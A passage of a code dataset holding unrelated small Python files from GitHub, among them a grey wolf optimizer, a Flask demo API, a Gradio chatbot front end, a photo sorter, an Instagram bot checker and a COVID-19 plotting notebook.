Sleeping for {fetch_interval_s}s...')\n if len(new_entries is not max_entries_per_page):\n time.sleep(fetch_interval_s)\n return data\n\n\ndef query_api_text(api_url, cookies) -> str:\n return requests.get(api_url, headers=config.common_request_headers, cookies=cookies).text\n\n\ndef query_api_text_minified(api_url, cookies) -> str:\n response = query_api_text(api_url, cookies)\n return minify_string(response)\n\n\ndef minify_string(to_minimize) -> str:\n return to_minimize.replace(config.scrapeService_NON_BREAK_SPACE_CHAR, '').replace('\\n', ' ').replace('\\r', '').replace(' ', '').replace(' ,', ',')\n","repo_name":"japsuu/AsunnotKartalla","sub_path":"Services/scrapeService.py","file_name":"scrapeService.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42431916790","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\n\n\n# In[2]:\n\n\nenglish_score = np.array([55, 89, 76, 65, 48, 70])\nmath_score = np.array([60, 85, 60, 68, 55, 60])\nchinese_score = np.array([65, 90, 82, 72, 66, 77])\n\n\n# In[11]:\n\n\na = np.greater(english_score, math_score)\nnp.sum(a!=0)\n\n\n# In[15]:\n\n\nb = np.logical_and(chinese_score > english_score, chinese_score > math_score) \nc = np.all(b)\nc\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"kenny51104/exercise11","sub_path":"Untitled8.py","file_name":"Untitled8.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39028491132","text":"import tkinter as tk\r\nfrom estructurasLineales.pila import Pila\r\n\r\n# Create the main window\r\nroot = tk.Tk()\r\n\r\n# Set the window title\r\nroot.title(\"Python GUI - TEST\")\r\n\r\n# Set the window dimensions\r\nroot.geometry(\"600x500\")\r\n\r\nusername = tk.StringVar()\r\npila= Pila()\r\npila.push('Iñigo')\r\npila.push(14)\r\npila.push(5)\r\n\r\n\r\n\r\ndef submit():\r\n print(username.get())\r\n if username.get():\r\n tk.Label(root, text=username.get()).pack()\r\n else:\r\n tk.Label(root, text=pila.display()).pack()\r\n \r\n username.set(\"\")\r\n\r\n\r\n# Create a Label widget\r\ntk.Label(root, text=\"Hello, world!\").pack()\r\n\r\ntk.Button(root, text=\"Click me!\", command = submit).pack() \r\ntk.Checkbutton(root).pack() \r\n\r\n\r\ntk.Entry(justify=tk.LEFT, textvariable=username).pack()\r\n\r\n\r\n\r\n# Pack the Label widget to display it on the window\r\n# label.pack()\r\n\r\n# Start the main event loop\r\nroot.mainloop()\r\n\r\n\r\n\r\n\r\n","repo_name":"Inigo1405/EstructuraDatosAdv-Verano-2023","sub_path":"pythonGUI.py","file_name":"pythonGUI.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42674538652","text":"a=open(\"rank.txt\",\"r\")\nb=a.readlines()\nsquares=[]\nfor i in range(len(b)):\n c=(b[i])\n my_list=(c.split())\n mynewlist = [s for s in my_list if s.isdigit()]\n if mynewlist[3]==\"11\":\n d=mynewlist[2]\n squares.append(int(d))\nprint(sorted(squares)) \n","repo_name":"pratyush201102/Python-","sub_path":"IOE.py","file_name":"IOE.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7517537914","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport pandas as pd\nimport math\nfrom sklearn import svm\nfrom sklearn import model_selection, preprocessing\nfrom 
sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error\nimport numpy.random as rd\nimport matplotlib.pyplot as plt\n\n\n# Fitness functions\n# Sphere test function [-100,100]\ndef sphere(position):\n    total = 0\n    for i in range(len(position)):\n        total += position[i] ** 2\n    return total\n\n\n# Ackley test function [-32,32]\ndef ackley(position):\n    a = 20\n    b = 0.2\n    c = 2.0 * math.pi\n    firstSum = 0.0\n    secondSum = 0.0\n    for i in range(len(position)):\n        firstSum += position[i] ** 2.0\n        secondSum += math.cos(c * position[i])\n    n = float(len(position))\n    f = -a * math.exp(-b * math.sqrt(firstSum / n)) - math.exp(secondSum / n) + a + math.e\n    return f\n\n\n# Rastrigin test function [-5.12,5.12]\ndef Rastrigin(position):\n    A = 10.0\n    total = 0\n    for i in range(len(position)):\n        total += position[i] ** 2 - A * math.cos(2 * math.pi * position[i]) + A\n    return total\n\n\n# Rosenbrock test function [-30,30]\ndef Rosenbrock(position):\n    a = 100.0\n    total = 0\n    for i in range(len(position)-1):\n        total += a*(position[i+1] - position[i] * position[i])**2 + (position[i]-1)*(position[i]-1)\n    return total\n\n\n# Generate a tent chaotic sequence\ndef tentmap12(alpha, x0, max_g):\n    \"\"\"\n    tent map function\n    :param alpha: parameter between 0 and 1\n    :param x0: initial value\n    :param max_g: number of iterations\n    :return: list of function values\n    \"\"\"\n    x = x0\n    x_list = []\n    for i in max_g:\n        if x < alpha:\n            x = x / alpha\n        else:\n            x = (1 - x) / (1 - alpha)\n        x_list.append(x)\n    return x_list\n\n# Boundary handling: clamp a position that left the search space\ndef relocation(loc, lb, ub):\n    if loc > ub:\n        loc = ub\n    if loc < lb:\n        loc = lb\n    return loc\n\n# 3. GWO optimization algorithm (improved variant)\ndef IGWO(fitfunc,SearchAgents_no, Max_iteration, dim, lb, ub):\n    # Initialize the positions of the leader wolves\n    Alpha_pos = np.zeros((SearchAgents_no,dim))\n    Beta_pos = np.zeros((SearchAgents_no,dim))\n    Delta_pos = np.zeros((SearchAgents_no,dim))\n    # Initialize the objective values of the leader wolves\n    Alpha_score = float(\"inf\")\n    Beta_score = float(\"inf\")\n    Delta_score = float(\"inf\")\n\n    # TO DO: generate the initial population with a tent map\n    max_g = np.linspace(1, SearchAgents_no, num=SearchAgents_no)\n    # Generate tent sequences, one per dimension\n    x_list = np.zeros((dim, SearchAgents_no))\n    tent = np.zeros((SearchAgents_no, dim))\n    for i in range(0, dim):\n        x_list[i] = tentmap12(0.6, rd.random(1), max_g)\n    for i in range(0, SearchAgents_no):\n        for j in range(0, dim):\n            tent[i,j] = x_list[j,i]\n    Positions = np.dot(tent, (ub - lb)) + lb\n    # Positions = np.dot(rd.rand(SearchAgents_no, dim), (ub - lb)) + lb  # initialize the first search positions\n    print('-------')\n\n    iterations = []\n    f = []\n\n    # Main loop\n    index_iteration = 0\n    while index_iteration < Max_iteration:\n\n        # Iterate over each wolf\n        for i in range(0, SearchAgents_no):\n            # If a search position left the search space, bring it back inside\n            for j in range(0, dim):\n                Positions[i, j] = relocation(Positions[i, j], lb, ub)\n            scores = fitfunc(Positions[i])\n            # fitness = (1 - scores) * 100\n            fitness = scores\n            if fitness < Alpha_score:  # if the objective value beats the Alpha wolf's\n                Alpha_score = fitness  # update the Alpha wolf's objective value to the best value\n                Alpha_pos = Positions[i]  # and update the Alpha wolf's position to the best position\n            if fitness > Alpha_score and fitness < Beta_score:  # if the objective value lies between the Alpha and Beta wolves'\n                Beta_score = fitness  # update the Beta wolf's objective value\n                Beta_pos = Positions[i]\n            if fitness > Alpha_score and fitness > Beta_score and fitness < Delta_score:  # if the objective value lies between the Beta and Delta wolves'\n                Delta_score = fitness  # update the Delta wolf's objective value\n                Delta_pos = Positions[i]\n\n        # TO DO: improved convergence factor\n        # m=rd.random(1)\n        # a = 2 *((1-index_iteration / Max_iteration)**m)\n        # a = 2 - 2 * (index_iteration / Max_iteration)\n        a = 2 - 2 * (index_iteration / Max_iteration)**2\n\n        # Iterate over each wolf\n        for i in range(0, SearchAgents_no):\n            # Iterate over each dimension\n            for j in range(0, dim):\n                # Encircle the prey: position update\n                r1 = rd.random(1)  # random number in [0, 1)\n                r2 = rd.random(1)\n                A1 = 2 
* a * r1 - a  # coefficient A\n                C1 = 2 * r2  # coefficient C\n\n                # Position update towards the Alpha wolf\n                D_alpha = abs(C1 * Alpha_pos[j] - Positions[i, j])\n                X1 = Alpha_pos[j] - A1 * D_alpha\n\n                r1 = rd.random(1)\n                r2 = rd.random(1)\n\n                A2 = 2 * a * r1 - a\n                C2 = 2 * r2\n\n                # Position update towards the Beta wolf\n                D_beta = abs(C2 * Beta_pos[j] - Positions[i, j])\n                X2 = Beta_pos[j] - A2 * D_beta\n\n                r1 = rd.random(1)\n                r2 = rd.random(1)\n\n                A3 = 2 * a * r1 - a\n                C3 = 2 * r2\n\n                # Position update towards the Delta wolf\n                D_delta = abs(C3 * Delta_pos[j] - Positions[i, j])\n                X3 = Delta_pos[j] - A3 * D_delta\n\n                # Position update\n                Positions[i, j] = (X1 + X2 + X3) / 3\n                # Positions[i, j] = (5 * X1 + 3 * X2 + 2 * X3) / 10\n\n        # TO DO: differential evolution step\n        # Crossover\n        # Wmax = 1.5\n        # Wmin = 0.25\n        # W = (Wmax - Wmin) * (Max_iteration - index_iteration) / Max_iteration + Wmin\n        W = 0.5\n        V = Alpha_pos + W * (Beta_pos - Delta_pos)\n        # Mutation\n        CR = 0.4  # crossover probability constant\n        U = [[0 for i in range(dim)] for i in range(SearchAgents_no)]\n        for i in range(0, SearchAgents_no):\n            for j in range(0, dim):\n                # keep the mutant vector inside the bounds\n                V[j] = relocation(V[j], lb, ub)\n                # boundary handling for the updated wolf position\n                Positions[i, j] = relocation(Positions[i, j], lb, ub)\n                rand_j = rd.randint(0, dim - 1)\n                rand_float = rd.random()\n                if rand_float <= CR or rand_j == j:\n                    U[i][j] = V[j]\n                else:\n                    U[i][j] = Positions[i, j]\n        # Selection\n        for i in range(0, SearchAgents_no):\n            # recompute the fitness\n            x_score = fitfunc(Positions[i])\n            u_score = fitfunc(U[i])\n            if u_score <= x_score:\n                Positions[i] = U[i]\n\n        index_iteration = index_iteration + 1\n        iterations.append(index_iteration)\n        # accuracy.append((100 - Alpha_score) / 100)\n        f.append(Alpha_score)\n        print('----------------iteration--------------------' + str(index_iteration))\n        print('f:' + str(Alpha_score))\n\n    return iterations, f\n\n\ndef GWO(fitfunc, SearchAgents_no, Max_iteration, dim, lb, ub):\n    # Initialize the positions of the leader wolves\n    Alpha_pos = np.zeros((SearchAgents_no,dim))\n    Beta_pos = np.zeros((SearchAgents_no,dim))\n    Delta_pos = np.zeros((SearchAgents_no,dim))\n\n    # Initialize the objective values of the leader wolves\n    Alpha_score = float(\"inf\")\n    Beta_score = float(\"inf\")\n    Delta_score = float(\"inf\")\n\n    # Initialize the first search positions\n    Positions = np.dot(rd.rand(SearchAgents_no, dim), (ub - lb)) + lb\n    print(Positions)\n    print('-------')\n\n    iterations = []\n    f = []\n\n    # Main loop\n    index_iteration = 0\n    while index_iteration < Max_iteration:\n\n        # Iterate over each wolf\n        for i in range(0, SearchAgents_no):\n            # If a search position left the search space, bring it back inside\n            for j in range(0, dim):\n                Positions[i, j] = relocation(Positions[i, j], lb, ub)\n            scores = fitfunc(Positions[i])\n            # fitness = (1 - scores) * 100\n            fitness = scores\n            if fitness < Alpha_score:  # if the objective value beats the Alpha wolf's\n                Alpha_score = fitness  # update the Alpha wolf's objective value to the best value\n                Alpha_pos = Positions[i]  # and update the Alpha wolf's position to the best position\n            if fitness > Alpha_score and fitness < Beta_score:  # if the objective value lies between the Alpha and Beta wolves'\n                Beta_score = fitness  # update the Beta wolf's objective value\n                Beta_pos = Positions[i]\n            if fitness > Alpha_score and fitness > Beta_score and fitness < Delta_score:  # if the objective value lies between the Beta and Delta wolves'\n                Delta_score = fitness  # update the Delta wolf's objective value\n                Delta_pos = Positions[i]\n\n        # a = 2 - 2 * (index_iteration / Max_iteration)\n        a = 2 - 2 * (index_iteration / Max_iteration)**2\n        # m = rd.random(1)\n        # a = 2 * ((1 - index_iteration / Max_iteration) ** m)\n        # Iterate over each wolf\n        for i in range(0, SearchAgents_no):\n            # Iterate over each dimension\n            for j in range(0, dim):\n                # Encircle the prey: position update\n                r1 = rd.random(1)  # random number in [0, 1)\n                r2 = rd.random(1)\n                A1 = 2 * a * r1 - a  # coefficient A\n                C1 = 2 * r2  # coefficient C\n\n                # Position update towards the Alpha wolf\n                D_alpha = abs(C1 * Alpha_pos[j] - Positions[i, j])\n                X1 = Alpha_pos[j] - A1 * D_alpha\n\n                r1 = rd.random(1)\n                r2 = rd.random(1)\n\n                A2 = 2 * a * r1 - a\n                C2 = 2 * 
r2\n\n                # Position update towards the Beta wolf\n                D_beta = abs(C2 * Beta_pos[j] - Positions[i, j])\n                X2 = Beta_pos[j] - A2 * D_beta\n\n                r1 = rd.random(1)\n                r2 = rd.random(1)\n\n                A3 = 2 * a * r1 - a\n                C3 = 2 * r2\n\n                # Position update towards the Delta wolf\n                D_delta = abs(C3 * Delta_pos[j] - Positions[i, j])\n                X3 = Delta_pos[j] - A3 * D_delta\n\n                # Position update\n                Positions[i, j] = (X1 + X2 + X3) / 3\n\n        index_iteration = index_iteration + 1\n        iterations.append(index_iteration)\n        f.append(Alpha_score)\n        print('----------------iteration--------------------' + str(index_iteration))\n        print('f:' + str(Alpha_score))\n    return iterations, f\n\n\ndef plot(iterations, mse):\n    plt.plot(iterations, mse,c='green')\n    plt.xlabel('iteration', size=14)\n    plt.ylim(0,10000)\n    plt.ylabel('best score', size=10)\n    plt.title('GWO')\n    plt.show()\n\n\nif __name__ == '__main__':\n    print('----------------.parameter settings------------')\n    SearchAgents_no = 30  # pack size (number of wolves)\n    Max_iteration = 500  # maximum number of iterations\n    dim = 30  # dimensionality\n    lb = -30  # lower bound of the parameters\n    ub = 30  # upper bound of the parameters\n\n    print('----------------3.GWO-----------------')\n    # iterations, f = GWO(sphere,SearchAgents_no, Max_iteration, dim, lb, ub)\n    # Iiterations, If = IGWO(Rastrigin, SearchAgents_no, Max_iteration, dim, lb, ub)\n    print('----------------4.show results-----------------')\n    # plt.plot(iterations, f)\n    # plt.plot(Iiterations, If, c='green')\n    # # plt.xlabel('iteration', size=14)\n    # # plt.ylim(0, 20)\n    # # plt.ylabel('best score', size=10)\n    # # plt.title('GWO')\n    # # plt.show()\n    fit_g = []\n    for i in range(30):\n        iterations, f = IGWO(Rosenbrock,SearchAgents_no, Max_iteration, dim, lb, ub)\n        fit_g.append(f[-1])\n    fig_mean = np.mean(fit_g)\n    fig_std = np.std(fit_g, ddof=1)\n    print(\"best value: %f\" % min(fit_g))\n    print(\"mean value: %f\" % fig_mean)\n    print(\"worst value: %f\" % max(fit_g))\n    print(\"standard deviation: %f\" % fig_std)\n    print(min(fit_g))\n    print(fig_mean)\n    print(max(fit_g))\n    print(fig_std)\n    print(fit_g)\n\n\n\n\n","repo_name":"zjq222xwj/SVM-optimize","sub_path":"testFunc.py","file_name":"testFunc.py","file_ext":"py","file_size_in_byte":12284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17035040301","text":"#!/usr/bin/env python\n# author = 'ZZH'\n# time = 2022/11/13\n# project = leetcode6234 - number of subarrays with LCM equal to K\nimport math\nfrom typing import List\n\n\nclass Solution:\n    def subarrayLCM(self, nums: List[int], k: int) -> int:\n        ans = 0\n        for i in range(len(nums)):\n            num = nums[i]\n            for j in range(i, len(nums)):\n                if num % nums[j] != 0:\n                    num = math.lcm(num, nums[j])\n                if num == k:\n                    ans += 1\n                if num > k:\n                    break\n        return ans\n","repo_name":"ZZHbible/leetcode","sub_path":"319周赛前三题/leetcode6234-最小公倍数为K的子数组数目.py","file_name":"leetcode6234-最小公倍数为K的子数组数目.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73671399931","text":"# write a Flask API which can return the square of a number\nfrom flask import Flask, jsonify\n\napp = Flask(__name__)\n@app.route('/',methods=[\"GET\"])\ndef home_page():\n    message = \"Hello , I am learning development of API in GCP \"\n    response = {'my_response':message}\n    return jsonify(response)\n\n@app.route(\"/calculate/<int:num>\",methods=[\"GET\"])\ndef calculate_square(num):\n    response = {'Given number is ':num,\n                'Square of number':num**2}\n    return jsonify(response)\n\nif __name__ == \"__main__\":\n    
app.run(debug=True,host=\"0.0.0.0\")","repo_name":"HSubbu/GCP-Exercises-repo","sub_path":"exercise-api/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2388676318","text":"import gradio as gr\nimport copy\nimport time\nfrom datetime import datetime\nfrom argparse import ArgumentParser\nimport torch\nfrom transformers import (\n GenerationConfig\n)\nimport os\nfrom inference import Assistant\nwith open(\"model_identity.txt\", 'r', encoding='utf8') as f:\n model_identity = f.readlines()\n if model_identity:\n model_identity = model_identity[0].strip()\nmax_context_len = 2048\n\n\n\ndef count_history_len(history):\n sum = 0\n for turn in history:\n sum += len(turn[0])\n sum += len(turn[1])\n return sum\n\ndef get_bot_message(message, chat_history):\n context = {\"messages\": []}\n history = copy.deepcopy(chat_history)\n\n if len(message) > max_context_len:\n return None\n\n while (count_history_len(history) + len(message)) > max_context_len:\n history = history[1:]\n sys.update(value=f\"Context longer than {max_context_len} is ignored.\")\n\n for turn in chat_history:\n context[\"messages\"].append({\"role\": \"user\", \"content\": turn[0]})\n context[\"messages\"].append({\"role\": \"assistant\", \"content\": turn[1]})\n\n context[\"messages\"].append({\"role\": \"user\", \"content\": message})\n\n responses, scores = assistant.inference([context])\n bot_message = responses[0]\n\n return bot_message\n\ndef respond(message, chat_history, request: gr.Request):\n sys.update(value=welcome)\n bot_message = get_bot_message(message, chat_history)\n if bot_message is None:\n sys.update(value=f\"Your input message should no longer than {max_context_len}.\")\n return message, chat_history\n time.sleep(0.05)\n chat_history.append((message, bot_message))\n ip = str(request.client)\n now = datetime.now()\n record_time = now.strftime(\"%m-%d-%Y-%H-%M-%S\")\n output_path = os.path.join(\"gradio_chats\", ip + \".txt\")\n os.makedirs(os.path.dirname(output_path), exist_ok=True)\n with open(output_path, \"a\", encoding=\"utf-8\") as f:\n f.write(record_time+\"\\n\")\n f.write(\"用户: \" + message + \"\\n\")\n f.write(\"助手: \" + bot_message + \"\\n\")\n\n return \"\", chat_history\n\ndef start_new_line(message, chat_history):\n message += \"\\n\"\n return message, chat_history\n\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\n \"--model_name_or_path\", type=str, default=\"ChiyuSONG/data-efficient-training-of-LLMs-v1\"\n )\n args = parser.parse_args()\n\n with torch.no_grad():\n assistant = Assistant(args.model_name_or_path)\n tokenizer = assistant.tokenizer\n config = GenerationConfig(\n max_new_tokens=max_context_len // 2,\n min_length=1,\n do_sample=False,\n temperature=0.2,\n top_k=40,\n top_p=0.6,\n repetition_penalty=1.1,\n output_scores=True,\n return_dict_in_generate=True,\n pad_token_id=tokenizer.pad_token_id,\n eos_token_id=[tokenizer.bos_token_id, tokenizer.eos_token_id, tokenizer.unk_token_id,\n tokenizer.eot_token_id, tokenizer.user_token_id, tokenizer.assistant_token_id],\n )\n assistant.config = config\n assistant.set_model_identity(model_identity)\n\n with gr.Blocks() as demo:\n welcome = \"Welcome!\"\n sys = gr.Markdown(value=welcome)\n chatbot = gr.Chatbot()\n msg = gr.Textbox(placeholder=\"Press Shift+Enter to start a new line...\")\n sub = gr.Button(\"Submit\")\n clear = gr.ClearButton([msg, chatbot])\n\n 
sub.click(respond, [msg, chatbot], [msg, chatbot])\n msg.submit(start_new_line, [msg, chatbot], [msg, chatbot])\n\n demo.launch(share=True)\n","repo_name":"ChiyuSONG/data-efficient-training-of-LLMs","sub_path":"chat_gradio.py","file_name":"chat_gradio.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"8638261926","text":"n = int(input())\narr = sorted(list(map(int, input().split())))\n\nm = int(input())\narr2 = list(map(int, input().split()))\n\n\ndef binary_search(start, end, target):\n middle = (start + end) // 2\n while True:\n if arr[middle] < target:\n start = middle\n middle = (middle + end) // 2\n elif arr[middle] > target:\n end = middle\n middle = (start + middle) // 2\n # print(start, middle, end)\n if arr[middle] == target:\n return 1\n elif middle == start:\n return 0\n\n\nfor num in arr2:\n print(binary_search(0, len(arr), num))\n","repo_name":"yangwooseong/algorithm","sub_path":"boj/1920.py","file_name":"1920.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3936523835","text":"import os\nimport PIL.Image\nimport shutil\nimport argparse\n\n# _pathname = \"D:\\Zdjecia\\\\test\"\n# _test_pathname = \"D:\\\\test\"\n\n\ndef make_magic(pathname):\n list_of_dates = []\n for file in os.listdir(pathname):\n path_of_file = os.path.join(pathname,file)\n if os.path.isdir(path_of_file):\n continue\n year = extract_year_from_file(path_of_file)\n if year is None:\n continue\n if year not in list_of_dates:\n list_of_dates.append(year)\n new_directory_path = os.path.join(pathname,str(year))\n if not os.path.exists(new_directory_path):\n os.mkdir(new_directory_path)\n print(f\"Created new directory: {new_directory_path}\")\n try:\n shutil.move(path_of_file, new_directory_path)\n except shutil.Error as e:\n print(str(e))\n\n\ndef extract_year_from_file(path):\n year = None\n try:\n img = PIL.Image.open(path)\n exif_data = img._getexif()\n date = exif_data[306]\n year = date[:date.find(\":\")]\n except Exception as e:\n print(e)\n return year\n\ndef create_menu():\n parser = argparse.ArgumentParser(description=\"How to use:\")\n parser.add_argument('-p','--path', type=str, help='Path to directory.', required=True)\n\n menu_args = parser.parse_args()\n\n return menu_args\n\ndef main():\n args = create_menu()\n\n if not os.path.exists(args.path):\n print(\"Directory doesn't exist. 
Ending program...\")\n return\n make_magic(args.path)\n\nif __name__ == '__main__':\n main()","repo_name":"Kankarollo/PhotoOrganizer","sub_path":"photo_manager.py","file_name":"photo_manager.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12809717420","text":"\"\"\"\nCheck if the bot is able to login into user account\n\"\"\"\n\nfrom insta_ops import InstaOps\nimport multiprocessing as mp\nimport pandas as pd\n\ndef worker(hash_tag):\n instance = InstaOps(True, True, True, True)\n if instance._bool_check_tag(hash_tag):\n return hash_tag\n\ntags_df = pd.read_excel('insta_config.xlsx', sheet_name='hashtags')\ntags = list(tags_df.hashtags)\n\nprint(\"Checking for working hash_tags from insta_config\")\nprint(\"Commencing HAVOC, please close other applications...\")\nif __name__ == '__main__':\n p = mp.Pool(mp.cpu_count())\n working_hashtags=(p.map(worker, tags))\n _ = pd.DataFrame(working_hashtags, columns=[\"hashtags\"])\n _.to_csv(\"working_hashtags.csv\",index=False)\n print('Created \"working_hashtags.csv\"')\n\n\nprint(\"Checking user login\")\nbot = InstaOps(False)\nbot.account_init()\n","repo_name":"Aqua-4/auto-insta","sub_path":"chk_setup.py","file_name":"chk_setup.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"71050106491","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. 
pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory\n\nimport os\nfor dirname, _, filenames in os.walk('/kaggle/input'):\n for filename in filenames:\n print(os.path.join(dirname, filename))\n\n# Any results you write to the current directory are saved as output.\ntrain = pd.read_csv('/kaggle/input/covid19-global-forecasting-week-4/train.csv')\ntest = pd.read_csv('/kaggle/input/covid19-global-forecasting-week-4/test.csv')\ntrain.head()\ntrain.describe()\ntrain.info()\ntrain['Date'] = pd.to_datetime(train['Date'])\ntest['Date'] = pd.to_datetime(test['Date'])\ntrain.isnull().sum()\ntrain['Province_State'].fillna(' ',inplace=True)\ntrain.head()\nimport plotly_express as px\n# last date\nlast_date = train.Date.max()\nlast_date\n# Countries with the most cases till last date\ncountries = train[train['Date']==last_date]\ncountries = countries.groupby('Country_Region', as_index=False)['ConfirmedCases','Fatalities'].sum()\ncountries = countries.nlargest(10,'ConfirmedCases')\ncountries.head()\n# Trend for top 10\ncase_trend = train.groupby(['Date','Country_Region'], as_index=False)['ConfirmedCases','Fatalities'].sum()\ncase_trend = case_trend.merge(countries, on='Country_Region')\ncase_trend.drop(['ConfirmedCases_y','Fatalities_y'],axis=1, inplace=True)\ncase_trend.rename(columns={'Country_Region':'Country', 'ConfirmedCases_x':'Cases', 'Fatalities_x':'Deaths'}, inplace=True)\n\ncase_trend.head()\npx.line(case_trend, x='Date', y='Cases', color='Country', title='COVID19 Total Cases growth for top 10 worst affected countries')\npx.line(case_trend, x='Date', y='Deaths', color='Country', title='COVID19 Total Deaths growth for top 10 worst affected countries')\n#Add columns for studying logarithmic trends\ncase_trend['ln(Cases)'] = np.log(case_trend['Cases']+1)# Added 1 to remove error due to log(0).\ncase_trend['ln(Deaths)'] = np.log(case_trend['Deaths']+1)\npx.line(case_trend, x='Date', y='ln(Cases)', color='Country', title='COVID19 Total Cases growth for top 10 worst affected countries(Logarithmic Scale)')\npx.line(case_trend, x='Date', y='ln(Deaths)', color='Country', title='COVID19 Total Deaths growth for top 10 worst affected countries(Logarithmic Scale)')\n# Mortality Rate\ncase_trend['Mortality Rate%'] = round((case_trend.Deaths/case_trend.Cases)*100,2)\npx.line(case_trend, x='Date', y='Mortality Rate%', color='Country', title='Variation of Mortality Rate% \\n(Top 10 worst affected countries)')\ndf_usa = train.query(\"Country_Region=='US'\")\nUS_cases = df_usa.groupby('Date',as_index=False)['ConfirmedCases','Fatalities'].sum()\nUS_cases.head()\npx.bar(US_cases, x='Date', y='ConfirmedCases')\nimport plotly.graph_objects as go\nfig = go.Figure(data=[\n go.Bar(name='Cases', x=US_cases['Date'], y=US_cases['ConfirmedCases']),\n go.Bar(name='Deaths', x=US_cases['Date'], y=US_cases['Fatalities'])\n])\n# Change the bar mode\nfig.update_layout(barmode='overlay', title='Daily Case and Death count(USA)')\nfig.show()\ndf_India = train.query(\"Country_Region=='India'\")\nIndia_cases = df_India.groupby('Date',as_index=False)['ConfirmedCases','Fatalities'].sum()\ndef add_daily_measures(df):\n df.loc[0,'Daily Cases'] = df.loc[0,'ConfirmedCases']\n df.loc[0,'Daily Deaths'] = df.loc[0,'Fatalities']\n for i in range(1,len(df)):\n df.loc[i,'Daily Cases'] = df.loc[i,'ConfirmedCases'] - df.loc[i-1,'ConfirmedCases']\n df.loc[i,'Daily Deaths'] = df.loc[i,'Fatalities'] - 
df.loc[i-1,'Fatalities']\n    #Make the first row as 0 because we don't know the previous value\n    df.loc[0,'Daily Cases'] = 0\n    df.loc[0,'Daily Deaths'] = 0\n    return df\nIndia_cases = add_daily_measures(India_cases)\nIndia_cases.head()\nfig = go.Figure(data=[\n    go.Bar(name='Cases', x=India_cases['Date'], y=India_cases['Daily Cases']),\n    go.Bar(name='Deaths', x=India_cases['Date'], y=India_cases['Daily Deaths'])\n])\n# Change the bar mode\nfig.update_layout(barmode='overlay', title='Daily Case and Death count(India)')\nfig.show()\n# Give Lockdown Notation\nfig.update_layout(barmode='overlay', title='Daily Case and Death count(India)',\n                  annotations=[dict(x='2020-03-23', y=106, xref=\"x\", yref=\"y\", text=\"Lockdown Imposed(23rd March)\", showarrow=True, arrowhead=1, ax=-100, ay=-100)])\nfig.show()\ndf_Italy = train.query(\"Country_Region=='Italy'\")\nItaly_cases = df_Italy.groupby('Date',as_index=False)['ConfirmedCases','Fatalities'].sum()\nItaly_cases = add_daily_measures(Italy_cases)\nfig = go.Figure(data=[\n    go.Bar(name='Cases', x=Italy_cases['Date'], y=Italy_cases['Daily Cases']),\n    go.Bar(name='Deaths', x=Italy_cases['Date'], y=Italy_cases['Daily Deaths'])\n])\n# Give Lockdown Notation\nfig.update_layout(barmode='overlay', title='Daily Case and Death count(Italy)',\n                  annotations=[dict(x='2020-03-09', y=1797, xref=\"x\", yref=\"y\", text=\"Lockdown Imposed(9th March)\", showarrow=True, arrowhead=1, ax=-100, ay=-100)])\nfig.show()\n#Spain\ndf_Spain = train.query(\"Country_Region=='Spain'\")\nSpain_cases = df_Spain.groupby('Date',as_index=False)['ConfirmedCases','Fatalities'].sum()\nSpain_cases = add_daily_measures(Spain_cases)\nfig = go.Figure(data=[\n    go.Bar(name='Cases', x=Spain_cases['Date'], y=Spain_cases['Daily Cases']),\n    go.Bar(name='Deaths', x=Spain_cases['Date'], y=Spain_cases['Daily Deaths'])\n])\n# Give Lockdown Notation\nfig.update_layout(barmode='overlay', title='Daily Case and Death count(Spain)',\n                  annotations=[dict(x='2020-03-15', y=1797, xref=\"x\", yref=\"y\", text=\"Lockdown Imposed(15th March)\", showarrow=True, arrowhead=1, ax=-100, ay=-100)])\nfig.show()\nSpain_cases.head()\nimport seaborn as sns\ncases = train.groupby('Country_Region')['ConfirmedCases'].sum().reset_index()\ncases.head()\nfig = px.pie(cases, values='ConfirmedCases', names='Country_Region')\nfig.show()\nfig = px.line(Spain_cases, x='Date', y='ConfirmedCases')\nfig.show()\ndf_China = train.query(\"Country_Region=='China'\")\nChina_cases = df_China.groupby('Date',as_index=False)['ConfirmedCases','Fatalities'].sum()\nfig = px.line(China_cases, x='Date', y='ConfirmedCases')\nfig.update_xaxes(rangeslider_visible=True)\nfig.show()\n\nfig = px.line(India_cases, x='Date', y='ConfirmedCases')\nfig.update_xaxes(rangeslider_visible=True)\nfig.show()\nfig = px.line(US_cases, x='Date', 